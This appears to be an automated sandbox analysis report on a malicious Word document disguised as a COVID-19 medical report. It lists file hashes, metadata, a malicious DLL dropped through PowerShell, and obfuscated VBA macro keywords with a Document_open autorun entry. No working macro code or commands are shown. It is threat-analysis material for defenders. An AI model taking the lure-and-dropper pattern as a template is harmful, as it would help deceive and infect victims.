                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BI6L7G7Y2QOZYJA29CWB.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5868168732363137
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqiqvsqvJCwoQz8hQCsMqiqvsEHyqvJCworezv1YfHvf8OslUVKIu:cyvoQz8yTHnorezvQf8OiIu
                                              MD5:8DF3597FC8CA92C4E63FFBEB821B9AD1
                                              SHA1:EE4A843C8CAE2C74010E27B1DE46913B9EA53AFF
                                              SHA-256:23C71143C88BD3BCCC963DA5A454A77166EB32DC11A750897D414511EA606BED
                                              SHA-512:8AE71FDB265766BA88E1316F22C23328159A89D111479FC056F7D6EA4D6AA3AAA3F7E559BF49AEF2054BC70AAAD721E606126D479563C69B6B6D3F620E96823F
                                              Malicious:false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\Desktop\~$-8549 Medical report COVID-19.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                              C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):348504
                                              Entropy (8bit):4.292535319096508
                                              Encrypted:false
                                              SSDEEP:3072:avA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:a206xWgGxLxWN40PDKR/JnX2P
                                              MD5:1A94E3824866ACD3C565215AAC04C69B
                                              SHA1:F91A9CADB09F22A22B93732E09FBAA5DC8B6901B
                                              SHA-256:ABCFC9CD109EB8B287C9544663CE707DD9FA1AF0FC6CA61F67708F60CD23A63F
                                              SHA-512:6B68051ADB5C9F532EE5F43DD49E730418AF9F92125DDEE9D2CFFA4B0148AAF8F73046EDDB335BD12AFE47ABE13A15AB6B6C02BB70F2758C12A6AE607BB39620
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 46%, Browse
                                              • Antivirus: ReversingLabs, Detection: 93%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................<..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d....`.......0.............. ..@.text7..d....p.......2.............. ..@.text6..d............4.............. ..@.text5..d............6.............. ..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead, Author: Sara Ozuna, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 16:11:00 2021, Last Saved Time/Date: Fri Jan 22 16:11:00 2021, Number of Pages: 1, Number of Words: 3367, Number of Characters: 19194, Security: 8
                                              Entropy (8bit):6.723891422776511
                                              TrID:
                                              • Microsoft Word document (32009/1) 79.99%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                              File name:IU-8549 Medical report COVID-19.doc
                                              File size:171008
                                              MD5:be33bce1030d367cf23727936fc1fbfd
                                              SHA1:2731bb3115108d14d2a4d5abd49aef32468961c9
                                              SHA256:843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773
                                              SHA512:fb9a8d8e1ee8876e79df1702775867bba0406bcfefb102a738a5acbce8e5cde21d24e97b7214fcd6a524c31b12b64f5ff764da17e30b2a4c1a131d328fa85c1a
                                              SSDEEP:3072:jwT4OAEDCkss1NkYtWr7Agf5k9jySTdcrrXyQBsc0vWJVi4IrwVuYbdYPeFmfG5i:jwT4OAEDCkss1NkYtWr7Agf5k9jyTPI3
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "IU-8549 Medical report COVID-19.doc"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Office Word
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Title:
                                              Subject:Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead
                                              Author:Sara Ozuna
                                              Keywords:
                                              Comments:
                                              Template:Normal.dotm
                                              Last Saved By:
                                              Revion Number:1
                                              Total Edit Time:0
                                              Create Time:2021-01-22 16:11:00
                                              Last Saved Time:2021-01-22 16:11:00
                                              Number of Pages:1
                                              Number of Words:3367
                                              Number of Characters:19194
                                              Creating Application:Microsoft Office Word
                                              Security:8

                                              Document Summary

                                              Document Code Page:-535
                                              Number of Lines:159
                                              Number of Paragraphs:45
                                              Thumbnail Scaling Desired:False
                                              Company:
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams with VBA

                                              VBA File Name: Dulz0g2a3qqdjsty7, Stream Size: 25190
                                              General
                                              Stream Path:Macros/VBA/Dulz0g2a3qqdjsty7
                                              VBA File Name:Dulz0g2a3qqdjsty7
                                              Stream Size:25190
                                              Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 fa 62 ff 18 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              aOIKG
                                              FgPjRJEIR,
                                              tLOwC
                                              SeKqFAFNv
                                              Until
                                              OYlTFEt
                                              msHCWHCAt
                                              GnnqWGPGJ
                                              gYFIC
                                              NswmEPELA.Range
                                              vrXECqWF.Range
                                              EeuJHEHF
                                              PyJkHIE,
                                              aMiqITVGL
                                              lcxHPB:
                                              vajlM
                                              okSXVy
                                              AtZVIBkE
                                              GcgMIFBS
                                              QqMgHpfGB,
                                              qucrJCEBy,
                                              QntVIZAdD,
                                              OCclfDa
                                              qPVaAz
                                              piVqgYJ(iPrzI)
                                              (rqaveCGz
                                              cxLJIGiD
                                              USfrGE
                                              beeZpf:
                                              rqaveCGz,
                                              pWDVU
                                              BfQqFX,
                                              (FfmNDT
                                              FTLaqR
                                              WDyUCG
                                              KUSkBEC,
                                              QGvuB
                                              MidB$(vLWhdu,
                                              TNoCFZI
                                              hSmgtNpln
                                              njcnja
                                              (KUSkBEC
                                              UBound(QGvuB)
                                              wMDcH
                                              msHCWHCAt(PJULJBb)
                                              (OnZyDDGUB
                                              immQJ:
                                              rpBOJCg,
                                              zxmKGAJHA.Range
                                              PyJkHIE
                                              eKFHKDJw
                                              (USfrGE
                                              piVqgYJ
                                              lPbZa
                                              FkmBAH:
                                              QqMgHpfGB
                                              mvXsJDCI
                                              sXjiJI
                                              CuSGXNGI
                                              iXiRFIE
                                              IcgiD
                                              omukcDDAB
                                              VSeBJC
                                              MidB$(KWoNDrI,
                                              UBound(ugTHSC)
                                              IuiADKc
                                              FrGcEy
                                              NswmEPELA
                                              kGKlCH(TWSLHrEJ)
                                              PJULJBb,
                                              WotFy
                                              PJULJBb
                                              euviCGGE
                                              MidB$(QGvuB,
                                              aXyHAY(rjilFB)
                                              iPrzI,
                                              qLAiGc(tLOwC)
                                              fQyMHGCJ.Range
                                              NIEFpmJ
                                              UBound(qLAiGc)
                                              UBound(sXjiJI)
                                              BygJBD
                                              FfmNDT
                                              hXmVsAI
                                              NDrVK:
                                              tFqUPL
                                              (TyLaL
                                              tLOwC,
                                              cfmpCCej
                                              IZBck
                                              SeegFDA
                                              HaMJF,
                                              kGKlCH()
                                              rGxSBFAm
                                              lroNB.Range
                                              ezXAHG
                                              lPbZa.Range
                                              wjnsc
                                              LxgTE(mvXsJDCI)
                                              uwljH
                                              UXwvP
                                              FTLaqR,
                                              YxuWVAC
                                              rjilFB
                                              ASxkJEBEJ,
                                              nnjasd,
                                              Resume
                                              SeochBB:
                                              MidB$(gPiUJUCJ,
                                              (tLOwC
                                              UApNCTSB()
                                              cEEUvC,
                                              tksEqFXE
                                              dQimAHCD
                                              (qucrJCEBy
                                              avenCHqCM:
                                              MidB$(euviCGGE,
                                              HtbOAHKIF
                                              KboWpC
                                              MidB$(sXjiJI,
                                              hSmgtNpln:
                                              xeQqnwEGH.Range
                                              cxLJIGiD(FrGcEy)
                                              MidB$(piVqgYJ,
                                              FfmNDT,
                                              ZBLQItWK,
                                              PAPyDG
                                              qLAiGc()
                                              HZrrCCPJ:
                                              uvWvDCq
                                              vLWhdu
                                              uifQEJ
                                              (lZIWVW
                                              ugTHSC()
                                              InWYD
                                              GnnqWGPGJ,
                                              WEjBx
                                              WEjBx,
                                              UBound(msHCWHCAt)
                                              WygyQ
                                              FlHJG
                                              (QqMgHpfGB
                                              SJaMAW
                                              WystvJDiH
                                              XFQcotHEl
                                              HmdtGfbHA
                                              WotFy,
                                              (ZBLQItWK
                                              (PyJkHIE
                                              lkPbvChTB.Range
                                              MidB$(cxLJIGiD,
                                              beoayAGAs
                                              cQXOHIGG
                                              KWoNDrI
                                              fHEAXGB
                                              UeaVqCIF
                                              MidB$(CuSGXNGI,
                                              MidB$(UApNCTSB,
                                              ORvhuHGGD
                                              (FrGcEy
                                              hrhpx
                                              HoycEGGS
                                              lcxHPB
                                              MidB$(msHCWHCAt,
                                              PlYykHypI
                                              MidB$(okSXVy,
                                              (WotFy
                                              mbpdgB
                                              bkRdqzBB
                                              MidB$(ugTHSC,
                                              TyLaL
                                              rpBOJCg
                                              (TWSLHrEJ
                                              TZIFFtB.Range
                                              ORvhuHGGD,
                                              dKpjABOAD
                                              EWwbyEvG.Range
                                              EBcorGpdB
                                              TWSLHrEJ
                                              (iPrzI
                                              jKqFehtZP
                                              FgPjRJEIR
                                              avenCHqCM
                                              NlrKo,
                                              VqFNFwx
                                              UBound(YRistJGeF)
                                              HaMJF
                                              nBWRH
                                              UBound(KWoNDrI)
                                              bKFVL
                                              YEfXME:
                                              hfACeBO
                                              WystvJDiH.Range
                                              gPiUJUCJ()
                                              HYflxGv
                                              eKFHKDJw,
                                              HsCTGA
                                              zvYxeGGBh:
                                              OYlTFEt:
                                              hXmVsAI()
                                              GcgMIFBS,
                                              hXmVsAI(FTLaqR)
                                              txnfIE
                                              BkCHJMwO
                                              MidB$(qLAiGc,
                                              dNKFVFD:
                                              zxmKGAJHA
                                              VADSpA
                                              YEXZi
                                              KWoNDrI(GnnqWGPGJ)
                                              UBound(CuSGXNGI)
                                              UBound(LxgTE)
                                              UvPjdXBJH
                                              vLWhdu(NlrKo)
                                              dPnKGaIH
                                              YEfXME
                                              NlrKo
                                              Mid(Application.Name,
                                              bKFVL.Range
                                              euviCGGE()
                                              qLAiGc
                                              kfglYjE:
                                              piVqgYJ()
                                              rqaveCGz
                                              eGrznOJJ
                                              SeegFDA,
                                              ZBLQItWK
                                              eFdbX:
                                              kVnSBBJ
                                              cEEUvC
                                              FkmBAH
                                              CBOhDJ
                                              sXjiJI(ASxkJEBEJ)
                                              (XFQcotHEl
                                              YeeasmCg
                                              XFQcotHEl,
                                              VADSpA.Range
                                              RSCoIAgA
                                              MiRGG
                                              (QntVIZAdD
                                              itfbnIkB
                                              UBound(vLWhdu)
                                              qpYICE
                                              ipaAe
                                              DEdCJACpO
                                              nZrgFol
                                              (FTLaqR
                                              PTiWFW
                                              sXjiJI()
                                              JPAoPL
                                              aXyHAY
                                              ydHfQ
                                              WolyDl
                                              QntVIZAdD
                                              bjyQsJ
                                              (NlrKo
                                              lZIWVW,
                                              "sadsaccc"
                                              "sasdsacc"
                                              QGvuB()
                                              GRIeHCUTC:
                                              uwljH,
                                              rjilFB,
                                              msHCWHCAt()
                                              UBound(cxLJIGiD)
                                              iXiRFIE(BfQqFX)
                                              IwzPAgE
                                              YRistJGeF(MDLMBAHzC)
                                              euviCGGE(PyJkHIE)
                                              fgxZE
                                              lMxaZeHEA
                                              rdwmZFK,
                                              gPiUJUCJ(mXwueE)
                                              MidB$(ipaAe,
                                              arYPBNC
                                              vLWhdu()
                                              VqFNFwx.Range
                                              MidB$(hXmVsAI,
                                              UBound(euviCGGE)
                                              lIOoEHE
                                              UCtihtI
                                              tTUuY
                                              (HaMJF
                                              JQyfEHCFH:
                                              GRIeHCUTC
                                              (qpYICE
                                              ASxkJEBEJ
                                              VB_Name
                                              Word.Paragraph
                                              (rjilFB
                                              UBound(piVqgYJ)
                                              YRistJGeF()
                                              (rpBOJCg
                                              lkPbvChTB
                                              (mbpdgB
                                              vajlM:
                                              MidB$(YRistJGeF,
                                              JQyfEHCFH
                                              rdwmZFK
                                              MDLMBAHzC
                                              Content
                                              MIQyJC
                                              SysLpJnC
                                              eFdbX
                                              MidB$(aXyHAY,
                                              LxgTE
                                              PwKrSn
                                              KWoNDrI()
                                              NRXsPIGD
                                              mXwueE,
                                              (uwljH
                                              (ASxkJEBEJ
                                              UQnFD
                                              (cEEUvC
                                              RrOlGJCr
                                              hfACeBO:
                                              (PJULJBb
                                              mXwueE
                                              gPiUJUCJ
                                              MidB$(iXiRFIE,
                                              ipaAe()
                                              UBound(gPiUJUCJ)
                                              FWzgiHG
                                              (MDLMBAHzC
                                              iPrzI
                                              dNKFVFD
                                              kGKlCH
                                              (mvXsJDCI
                                              CuSGXNGI()
                                              bJfJIBEBC
                                              aXyHAY()
                                              HoycEGGS.Range
                                              IZBck,
                                              TZIFFtB
                                              IPiQsIN
                                              KUSkBEC
                                              beeZpf
                                              WmhUJ
                                              UBound(kGKlCH)
                                              TPpjQ:
                                              UApNCTSB(TyLaL)
                                              YRistJGeF
                                              UBound(UApNCTSB)
                                              UBound(ipaAe)
                                              okSXVy(rdwmZFK)
                                              MDLMBAHzC,
                                              BfQqFX
                                              VJBiOEoB
                                              rGxSBFAm.Range
                                              okSXVy()
                                              (rdwmZFK
                                              BvwhhQNB
                                              (IZBck
                                              oVIlzvB
                                              UQnFD.Range
                                              FoVpJCArD
                                              iXiRFIE()
                                              OnZyDDGUB,
                                              OJlopx
                                              yroaOGI
                                              jKqFehtZP.Range
                                              NDrVK
                                              TPpjQ
                                              USfrGE,
                                              Len(skuwd))
                                              qpYICE,
                                              MeewHjDR
                                              MidB$(kGKlCH,
                                              CBOhDJ.Range
                                              (WEjBx
                                              XcIBFVflC
                                              OnZyDDGUB
                                              RrOlGJCr:
                                              uJJmytp
                                              MIQyJC.Range
                                              EOBHCBBF
                                              TyLaL,
                                              ukURCshB
                                              mbpdgB,
                                              (ORvhuHGGD
                                              aetYHHHFP
                                              EWwbyEvG
                                              CuSGXNGI(KUSkBEC)
                                              noYAHFJkx
                                              ugTHSC(XFQcotHEl)
                                              (mXwueE
                                              (BfQqFX
                                              ipaAe(SeegFDA)
                                              TWSLHrEJ,
                                              vrXECqWF
                                              (SeegFDA
                                              dOQMo
                                              YMkAJIp
                                              wONTemEFr
                                              (eKFHKDJw
                                              UBound(hXmVsAI)
                                              immQJ
                                              fQyMHGCJ
                                              UBound(okSXVy)
                                              Mid(skuwd,
                                              OCclfDa.Range
                                              cxLJIGiD()
                                              zvYxeGGBh
                                              lroNB
                                              UBound(aXyHAY)
                                              dBfQDv
                                              LxgTE()
                                              lZIWVW
                                              UBound(iXiRFIE)
                                              HZrrCCPJ
                                              SeochBB
                                              Error
                                              xeQqnwEGH
                                              Puaskfwqwxz_
                                              Attribute
                                              FrGcEy,
                                              kfglYjE
                                              MoAcLJ
                                              yFQRXd
                                              Function
                                              lSvxKAE
                                              vJOKJuk
                                              mvXsJDCI,
                                              qucrJCEBy
                                              XbFndWSCC
                                              MidB$(LxgTE,
                                              (GcgMIFBS
                                              CYtYuIW
                                              UApNCTSB
                                              nnjasd
                                              IIShQCGJH
                                              (GnnqWGPGJ
                                              nYfpXuDyH
                                              QGvuB(WotFy)
                                              zIlgcDbCD
                                              ugTHSC
                                              (FgPjRJEIR
                                              skuwd
                                              fLcUFFJA
                                              VBA Code
                                              VBA File Name: Hj8dhqrdh_8498, Stream Size: 701
                                              General
                                              Stream Path:Macros/VBA/Hj8dhqrdh_8498
                                              VBA File Name:Hj8dhqrdh_8498
                                              Stream Size:701
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . b N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 fa 62 4e df 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Attribute
                                              VB_Name
                                              VBA Code
                                              VBA File Name: Sky5mdbfre3xe7q8, Stream Size: 1115
                                              General
                                              Stream Path:Macros/VBA/Sky5mdbfre3xe7q8
                                              VBA File Name:Sky5mdbfre3xe7q8
                                              Stream Size:1115
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . b . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 fa 62 c2 6b 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Document_open()
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Creatable
                                              VB_Name
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:146
                                              Entropy:4.00187355764
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.280441275353
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 540
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:540
                                              Entropy:4.09323636422
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ec 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 60 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                              Stream Path: 1Table, File Type: data, Stream Size: 6861
                                              General
                                              Stream Path:1Table
                                              File Type:data
                                              Stream Size:6861
                                              Entropy:6.02856268982
                                              Base64 Encoded:True
                                              Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                              Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                              General
                                              Stream Path:Macros/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:527
                                              Entropy:5.49968943522
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { D C 2 3 F 3 6 1 - 8 9 7 5 - 4 E 8 5 - B 2 7 9 - 1 5 E 2 D 2 0 E 1 4 0 C } " . . D o c u m e n t = S k y 5 m d b f r e 3 x e 7 q 8 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H j 8 d h q r d h _ 8 4 9 8 . . M o d u l e = D u l z 0 g 2 a 3 q q d j s t y 7 . . E x e N a m e 3 2 = " A l 3 m j h l b y h g 8 x a x a v " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B A B 8 0 5 3 5 4 3 3 9 4 3 3 9 4 3 3 9 4 3 3 9 "
                                              Data Raw:49 44 3d 22 7b 44 43 32 33 46 33 36 31 2d 38 39 37 35 2d 34 45 38 35 2d 42 32 37 39 2d 31 35 45 32 44 32 30 45 31 34 30 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 0d 0a 4d 6f 64 75 6c 65 3d 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74
                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 152
                                              General
                                              Stream Path:Macros/PROJECTwm
                                              File Type:data
                                              Stream Size:152
                                              Entropy:3.89422423899
                                              Base64 Encoded:True
